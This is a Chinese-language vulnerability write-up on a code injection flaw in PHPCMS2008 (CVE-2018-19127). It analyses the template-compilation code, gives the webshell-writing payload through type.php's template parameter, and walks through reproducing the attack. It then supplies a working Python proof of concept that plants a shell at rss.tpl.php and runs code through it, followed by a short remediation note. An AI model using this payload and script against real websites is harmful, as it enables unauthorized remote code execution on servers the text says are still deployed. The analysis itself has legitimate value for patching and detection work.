描述：

近日，互联网爆出PHPCMS2008代码注入漏洞（CVE-2018-19127）。攻击者利用该漏洞，可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。目前，漏洞利用原理已公开，厂商已发布新版本修复此漏洞。

影响范围：

PHPCMS2008 sp4及以下版本
虽然距离PHPCMS2008版本的推出已经10年，但仍有不少网站正在使用PHPCMS2008，包括政府、企业的网站；根据Fofa网络空间安全搜索引擎的全网精确搜索结果显示，还有近200个使用PHPCMS2008版本的网站；而如果使用模糊匹配对网站进行识别，匹配结果更达上万个。

通过利用该漏洞，攻击者在向路径可控的文件写入恶意脚本代码后，后续将能够向该文件发送webshell指令，在服务器上执行任意代码，因此该代码注入漏洞的影响较大。

漏洞分析：

在type.php中：
包含/include/common.inc.php 其作用是对$_GET,$_POST等全局变量进行注册。

image.png

PHP extract() 函数:
extract() 函数从数组中将变量导入到当前的符号表。
该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。
第二个参数 type 用于指定当某个变量已经存在，而数组中又有同名元素时，extract() 函数如何对待这样的冲突。
该函数返回成功导入到符号表中的变量数目。
EXTR_SKIP -如果有冲突，不覆盖已有的变量。
如：

<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>

结果

$a = Cat; $b = Dog; $c = Horse

在type.php第31行调用template函数

image.png

在/include/global.func.php文件中定义，包含如下代码：

function template($module = 'phpcms', $template = 'index', $istag = 0)
{
    $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
    if(TPL_REFRESH && (!file_exists($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html') > @filemtime($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/tag.inc.php') > @filemtime($compiledtplfile)))
    {
        require_once PHPCMS_ROOT.'include/template.func.php';
        template_compile($module, $template, $istag);
    }
    return $compiledtplfile;
}

不难看出，这里会继续调用/include/template.func.php中的template_compile();

<?php
function template_compile($module, $template, $istag = 0)
{
    $tplfile = TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html';
    $content = @file_get_contents($tplfile);
    if($content === false) showmessage("$tplfile is not exists!");
    $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
    $content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content);
    $strlen = file_put_contents($compiledtplfile, $content);
    @chmod($compiledtplfile, 0777);
    return $strlen;
}

在这个方法中，$template变量同时被用于$compiledtplfile中文件路径的生成，和$content中文件内容的生成。而$content变量当我们的输入为template=tag(){};@unlink(FILE);assert($_POST[1]);{//../rss自然会选择前者，而content内容中$template变量可控，最后file_put_contents函数写入任意代码

而攻击payload将$template变量被设置为如下的值：

tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

所以在template_compile()方法中，调用file_put_contents()函数时的第一个参数就被写成了

data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss.tpl.php

需要注意的是，file_put_contents路径为data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss.tpl.php

php会将其路径解析为data/cache_template/rss.tpl.php。

漏洞复现：

下载phpcms2008并安装

image.png

构造payload:

template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

image.png

插入内容，然后打开源码会发现在phpcms\data\cache_template下多了个rss.tpl.php文件

image.png

然后打开
会看到成功插入的内容

image.png

访问网站可以利用成功：

image.png

根据上述复现步骤和思路编写检测和利用poc（根据别人修改）

import HackRequests
import sys

def poc(arg, **kwargs):
    payload = r'''/type.php?template=tag_(){};@unlink(FILE);assert($_GET[1]);{//../rss'''
    hh = HackRequests.http(arg + payload)
    data = {'1':'phpinfo()'}
    shell_url = arg + '/data/cache_template/rss.tpl.php'
    r = HackRequests.http(shell_url,post = data)
    if r.status_code == 200 and 'allow_url_fopen' in r.text():
        result = {
            "name": "phpcms_2008 rce",  # 插件名称
            "content": "漏洞存在！攻击者利用该漏洞，可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。",  # 插件返回内容详情，会造成什么后果。
            "url": shell_url,  # 漏洞存在url
            "log": hh.log,
            "tag": "rce"  # 漏洞标签
        }
        print(result['content']+'\n'+'shell地址：'+result['url'])

if __name__=='__main__':
    if len(sys.argv)!=2:
        print('>>>>>>>>>>>python poc.py url<<<<<<<<<<<<<<')
        sys.exit(-1)
    else:
        url=sys.argv[1]
        poc(url)

image.png

漏洞修复：

临时解决可以在/type.php文件中对$template变量进行过滤，避免用户输入的含有”(“、”{“等符号的内容混入，并被当做路径和脚本内容处理。

但由于PHPCMS2008版本过旧，用户应尽量升级到最新版本的PHPCMS，才能够更好地保障安全。

参考：
https://www.freebuf.com/vuls/190631.html
http://www.cnblogs.com/ichunqiu/p/10039579.html